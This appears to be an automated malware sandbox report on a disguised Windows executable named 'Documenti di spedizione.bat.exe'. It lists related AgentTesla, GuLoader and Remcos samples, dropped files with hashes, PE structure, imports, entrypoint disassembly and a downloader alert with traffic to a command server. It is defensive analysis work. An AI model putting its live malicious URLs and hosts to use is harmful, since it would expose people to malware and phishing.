                            Svku9pKypu.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 104.26.12.205
                            pR65xo6sud.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 104.26.12.205
                            uLFOeGZaJS.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.74.152
                            Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSPago.docGet hashmaliciousLokibotBrowse
                            • 188.114.96.6
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 172.67.165.166
                            bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                            • 172.67.150.211
                            http://johnlewis.siteGet hashmaliciousUnknownBrowse
                            • 162.159.140.98
                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                            • 104.21.57.248
                            fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 104.21.67.152
                            https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                            • 162.159.61.3
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.16.9
                            Advertising Agreement for Youtube Cooperation.scrGet hashmaliciousLummaC StealerBrowse
                            • 104.21.33.143
                            Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).batGet hashmaliciousUnknownBrowse
                            • 104.21.36.187
                            DATACLUBLVOrder NO 000293988494948595850000595995000.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 109.248.150.252
                            payment receipt copy.bat.exeGet hashmaliciousRemcosBrowse
                            • 109.248.151.221
                            product sample requirement.exeGet hashmaliciousXWormBrowse
                            • 109.248.151.221
                            COTIZACIONSyCONSULTA#46789NOV24.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 46.183.220.125
                            Finvasken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 109.248.151.196
                            Finvasken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 109.248.151.196
                            USD Payment Receipt 12112024.exeGet hashmaliciousNoCry, XWormBrowse
                            • 109.248.151.21
                            86#U041b.exeGet hashmaliciousXWormBrowse
                            • 84.38.130.134
                            46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 109.248.150.169
                            46roqD3HEE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 109.248.150.169
                            UNIFIEDLAYER-AS-1USOrder NO 000293988494948595850000595995000.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 192.185.13.234
                            teste.sh4.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                            • 98.130.22.47
                            MGj3hwACvs.htmlGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                            • 192.185.77.66
                            https://ublypwgeo.turismoalperu.com/Get hashmaliciousCaptcha PhishBrowse
                            • 192.185.153.249
                            xd.spc.elfGet hashmaliciousMiraiBrowse
                            • 162.144.32.223
                            https://viisdmltfxtefrcr.adesense.com.br/rwjsgiuoetlhg/mrgnbfiuopegj/rtnlgsyioermbugr/example@email.comGet hashmaliciousPhisherBrowse
                            • 216.172.172.178
                            https://protect.checkpoint.com/v2/r01/___https:/s3.amazonaws.com/C88bb8c57filff9ffEnfrDflpfgzfgxvfEnfl9fhdnsijC.myrq___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjg0NTFhMGFiNjIyOTYxNWNjNDBhNTBlODdjNzQzNTA1Ojc6YjFhNTo5YjUxYTk0NDZmM2Y4NjljMTY5MDc0YmY4ZjFiZWNlODdhNGFhMWU2NDMxNjM5MjUzZGUyMmViMWY2ZmNkOTAzOmg6VDpUGet hashmaliciousUnknownBrowse
                            • 69.49.245.172
                            AudioplaybackVM--00-32AoTranscript.htmlGet hashmaliciousUnknownBrowse
                            • 69.49.245.172
                            http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                            • 192.254.185.70
                            pR65xo6sud.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 50.87.144.157
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0ebestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                            • 104.26.13.205
                            nicpeoplesideasgivenforme.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                            • 104.26.13.205
                            nicetomeetyougreatthignsgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                            • 104.26.13.205
                            fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 104.26.13.205
                            Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).batGet hashmaliciousUnknownBrowse
                            • 104.26.13.205
                            Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                            • 104.26.13.205
                            Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 104.26.13.205
                            lnvoice-1620804301.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                            • 104.26.13.205
                            lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                            • 104.26.13.205
                            https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402Get hashmaliciousUnknownBrowse
                            • 104.26.13.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nso28B6.tmp\System.dllOrder NO 000293988494948595850000595995000.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                FiddlerSetup.5.0.20245.10105-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                  HHn9tNeZd8.exeGet hashmaliciousGuLoaderBrowse
                                    wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      qmt875Vf1A.exeGet hashmaliciousGuLoaderBrowse
                                        wmKmOQ868z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          qmt875Vf1A.exeGet hashmaliciousGuLoaderBrowse
                                            czffIfANiL.exeGet hashmaliciousGuLoaderBrowse
                                              0GuwV0t2UU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):41
                                                Entropy (8bit):4.159517480745798
                                                Encrypted:false
                                                SSDEEP:3:aZxyzAXMD6WG4AQGNy:/sodMy
                                                MD5:72AA3249175DB3140CA2417E0D3734AF
                                                SHA1:26C42DF76BAE28052FE718345719D9C63C1D0CE5
                                                SHA-256:805937F3343642A10631ED3C4829F25DDFECB4EC9CB240D59C2BC8D57A9BFD83
                                                SHA-512:62B7380DB3DDCEB487C74400AE6640E4AECBAFBBFD9B5D30766EB14E04B968220A739D5E951EDC9D40EE649D2AEE7159258095D49A75E62890211FB64BD9FE59
                                                Malicious:false
                                                Reputation:low
                                                Preview:[minerologies]..Verifications=octateuch..
                                                Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1228397
                                                Entropy (8bit):3.963610153001338
                                                Encrypted:false
                                                SSDEEP:12288:iRSJxWzlZ+ZIY5+Sa1+l3zGPrqnZb+5BBz/IwTz9PP8Nl:Cy0zlZAZa1ofY5Nk
                                                MD5:D3B041FCA53F1D168CAA6D02DEC54281
                                                SHA1:E8338CC68628C210AF2551D10BB7D2C961606DE9
                                                SHA-256:3A88E38B169C63B0C11EEEEA815D3704E39060F9D2CF4AD5BBC7EEACE7667192
                                                SHA-512:8B4415938D77828E929D5626476DB041D30C474E055D31D4ACF9F37A2CE25D484E806776CF6A6DA977B46B9D2C82D816A9E8A703AB04C876224E17E6D3CAF87F
                                                Malicious:false
                                                Reputation:low
                                                Preview:.)......,...................v............).......).........................................................................................................................................................................................................................................G...T...............j...............................................................................................................................Y.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.804946284177748
                                                Encrypted:false
                                                SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: Order NO 000293988494948595850000595995000.exe, Detection: malicious, Browse
                                                • Filename: kelscrit.exe, Detection: malicious, Browse
                                                • Filename: FiddlerSetup.5.0.20245.10105-latest.exe, Detection: malicious, Browse
                                                • Filename: HHn9tNeZd8.exe, Detection: malicious, Browse
                                                • Filename: wmKmOQ868z.exe, Detection: malicious, Browse
                                                • Filename: qmt875Vf1A.exe, Detection: malicious, Browse
                                                • Filename: wmKmOQ868z.exe, Detection: malicious, Browse
                                                • Filename: qmt875Vf1A.exe, Detection: malicious, Browse
                                                • Filename: czffIfANiL.exe, Detection: malicious, Browse
                                                • Filename: 0GuwV0t2UU.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):195813
                                                Entropy (8bit):7.551514422413719
                                                Encrypted:false
                                                SSDEEP:3072:DxmxSxO4IDzoUrsKwBJm8ARd+BFg854zeZEQ+NLY5+LfWRoqFEL+a+lamtBtM:DxmYxOZzleod+CeDMY5+LfWRofL+a+lc
                                                MD5:A3DD8B9EC16C93FA601C948C71D62C54
                                                SHA1:C463421F2CC6AC30DCE4D6F90D28FD7FE5DE2A90
                                                SHA-256:A9EE0EB3558337ED45A056E16D0E3452D80CEB2DF6294C5DCA250DBBEE8DAAED
                                                SHA-512:3CA40EEF5D5B1AFD33AD39A22DEEC43C754E7F871E8162D0D420262C574D8EAB37B380906F993D95CF507F706D6FCB56873D6799279F4283361B8D0E586B3BF2
                                                Malicious:false
                                                Reputation:low
                                                Preview:...WWWW....v....`````.....v..Q...o.............>..........5............. ....).~~~..3..............00..........nnn........````........11.................8............}.::.....c.....W.,,,.............[[.................................=..................(............CC.....b..VV.......)...f...............D..SSS......*...............................}}}...............J........h..D.............X............................##..................................................Q.................]..........v..... ..........77......YYYY.....G....<<<.......@.j...OOO...U..................???......................&&&.......K.........$$.W.....................b.........**..........j...***..??.....77....l..{......{{.k.....tt.............WWW...JJ.!..T.U......mmmm..............=...................SSS..#.f.....uu.b..............N...?...................6..........444...............:........A...........................11.........................q..\\\.V............................................".........
                                                Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):94010
                                                Entropy (8bit):1.2383342979277752
                                                Encrypted:false
                                                SSDEEP:768:i9qrj3bsBMZsVMzeC+Uo6XHavWZQvXee9rq:xk2hQNrq
                                                MD5:9F64F450771196B87786BE2512310627
                                                SHA1:3A8ED73D8F37B79E1825CECA4E9FAF95CD69C41E
                                                SHA-256:2B3AEEDC78F7BF296454E5D28457B9B19F081DC637FE0680C748B3D670BA3395
                                                SHA-512:1558AFC4DE1058307867C54BDF660422D2117D5FDF47B6C141E68F701F1770048D3D5AB99895AAA4F058304B0BB24EA89BDFCB1381FECD7775D4BF65055B9CB3
                                                Malicious:false
                                                Reputation:low
                                                Preview:.................?C........................,....3......6........"..................P........y........................................................E..................................................................$...........!........J...................................................R................../...............(.......S................;........W......*.e..........D............*R...................`........[......................M..................................................................O..............................................x.............T........D.....................................................................w..................................."..............N...............C.....o..................#................P.........1..............................................W...........................c........................................................................................................................................h.................
                                                Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):435446
                                                Entropy (8bit):2.6546865339410535
                                                Encrypted:false
                                                SSDEEP:3072:PszGhVrr2nZb+5aKHhWh6/3y/5m/uSz9C0P84:EGPrqnZb+5BBWk/IwTz9C0P84
                                                MD5:3AB79F3588459D7B35273BDBF6B2BAE2
                                                SHA1:C5C937FEAC2490B619DC158AE439A4C96B643DE6
                                                SHA-256:5120B4C695953506E1DCA8619BD8D082F63E80B194BD79927617EED3EFD6A26B
                                                SHA-512:477A98445038CA61DDDE8442E4F87DC505D667EC7A9011ACB72D68E9B5DDC815A223AD3551F3E7C804B6AA590CB5FE8FFB74D59898600D191DF4DA4D8085A4A6
                                                Malicious:false
                                                Preview:0000000E0000005300740027004D4D4D0000006B006400E4002000008C8C0000FF000023003C0083838383838300AAAAAA0001006800000000002020000000ABABAB00009300BA000F0F0F0F00ED00E20039393939390000D7009B9B00000000040000000000DEDEDEDEDE00000078002E2E2E00001B1B0000000000A7A7A7001F1F1F0078000000002D00000E0007005400001500B300D60000003600ECECECEC00008D0000BA000000D8D80000004949006D6D6D6D000000002E2E00000000C100005D5D002F2F2F2F006B6B002B000000001E1E1E00000024242400C7C7006A6A6A0000BC00000000009292002D2D00C5005A00000000008100000000D800000000000000008B00001C00007E7E00004000008F009393000000696900DEDE008E8E8E8E8E0009000000000098000000890000000000373700006D00EFEFEF005A5A5A5A000071004747009A009292000000FB0000005F5F000000009300320000A9A9009700FFFFFF005E5E002C2C009090001A0000E200930000710000001E1E0000B7000000F5F5F5000000E4E4E4005E000000DCDC00828200DDDDDD00090909090909004D4D4D0000DC0000005A004D00DDDD00C9C9C900007200AF008F0000000015000000006100300007000000000071005454545454545400C100000000F0F0F0F000001C000000000606003B0000
                                                Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):480148
                                                Entropy (8bit):1.2440412261746137
                                                Encrypted:false
                                                SSDEEP:1536:JwEDT97SToCGRVFl5C1SX6/eibc4YMhoEw2T:eQcop5CP/eyYLEtT
                                                MD5:4593D427554A1F61D609FF98908779B3
                                                SHA1:F377A88EB1E9BD29DC1A2730EE3E85651D56C6A0
                                                SHA-256:2209B57FABE05E4E314D5FE84BC99892BC189F11B7793DD7F658E3D403D5FD3C
                                                SHA-512:33A2F6E58DFC1AA7B38E4AA1085B8740CFF02E1A42DB09F46C0516C3F9D9526A6D94D8CF9A6204A289BD6D8110FFD59B6A338F0B81EE1612FD8FD7B29EF272C7
                                                Malicious:false
                                                Preview:.............................t......|.................<................L........7..............................V...........+.......................L.......z...............................D..........................j.......................................C..\......P.............................................................../.........................................j.............q..[.....................................................................M.........................v........n.......,.....................................................<..q.................................................................................................................}.....................................................&.......F......N........G.......................$.........a.....*.................O.....:..............................................................................................V..................................................u......"u..............j.................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.564428301032185
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Documenti di spedizione.bat.exe
                                                File size:602'669 bytes
                                                MD5:a10e959289c077bc452de5c48abd7262
                                                SHA1:9b295da45f8cc4fa5e5b94ba1ad3de93c617eadf
                                                SHA256:e246806c6b16a736f29c6c3677c9f9263c8a0dc347a92a4f2606e93b13aec707
                                                SHA512:67e5e6cd4f850f889cc09ee909310691968dc6f44c8ab2a2c1628a42605c42b6c767fefe5454d6d29fbf0aeced3f99626f5bf4037a2f3de942a0156318015778
                                                SSDEEP:12288:tHadcxTchoKjyaOA/krybKcHGLoejfuLo8i5Zk4:VadhaKuaOA/NYfuLo8iHk4
                                                TLSH:1FD4E06626E2EC23E38457748662F73E89A2BE961971C2333AF56D8F7504F353C1C261
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....
                                                Icon Hash:7b7b6a6666766633
                                                Entrypoint:0x403665
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                Instruction
                                                sub esp, 000003F8h
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebp, ebp
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebp
                                                mov dword ptr [esp+18h], 0040A230h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [004080A0h]
                                                mov esi, dword ptr [004080A4h]
                                                lea eax, dword ptr [esp+34h]
                                                push eax
                                                mov dword ptr [esp+4Ch], ebp
                                                mov dword ptr [esp+0000014Ch], ebp
                                                mov dword ptr [esp+00000150h], ebp
                                                mov dword ptr [esp+38h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007F44212BDF1Ah
                                                lea eax, dword ptr [esp+34h]
                                                mov dword ptr [esp+34h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [esp+48h]
                                                mov ecx, dword ptr [esp+62h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [esp+00000148h], ax
                                                cmp dword ptr [esp+38h], 0Ah
                                                jnc 00007F44212BDEE8h
                                                and word ptr [esp+42h], 0000h
                                                mov eax, dword ptr [esp+40h]
                                                movzx ecx, byte ptr [esp+3Ch]
                                                mov dword ptr [00429B18h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [esp+38h]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [esp+00000148h]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                movzx ecx, byte ptr [esp+0000004Eh]
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x30ed8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x66d70x68004e97e586f167bf2d2eddcdba22e25c0eFalse0.6615835336538461data6.441769857560007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x1fb780x600e411b225ac3cd03a5dad8143ae82958dFalse0.5091145833333334data4.122928093833695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x2a0000x260000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x500000x30ed80x3100031e8deac1d179a39ac604bee10e25c60False0.4523875956632653data6.027927468960251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x503880x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2914121240601504
                                                RT_ICON0x60d880x9600Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.341015625
                                                RT_ICON0x6a3880x8000PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.99249267578125
                                                RT_ICON0x723880x5600Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.36664244186046513
                                                RT_ICON0x779880x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.40768612132352944
                                                RT_ICON0x7bd880x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.42948190789473684
                                                RT_ICON0x7e3880x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4815538194444444
                                                RT_ICON0x7f5880xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.55078125
                                                RT_ICON0x7ff880x600Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4811197916666667
                                                RT_DIALOG0x805880x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x806880x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x807a80xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x808700x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x808d00x84dataEnglishUnited States0.6742424242424242
                                                RT_VERSION0x809580x23cdataEnglishUnited States0.5314685314685315
                                                RT_MANIFEST0x80b980x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                DLLImport
                                                ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-04T13:40:15.537057+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649845109.248.150.25280TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 4, 2024 13:40:14.127605915 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:14.247387886 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:14.247473955 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:14.248409033 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:14.368124962 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:15.536971092 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:15.537056923 CET4984580192.168.2.6109.248.150.252
                                                Dec 4, 2024 13:40:15.537138939 CET8049845109.248.150.252192.168.2.6
                                                Dec 4, 2024 13:40:15.537153006 CET8049845109.248.150.252192.168.2.6
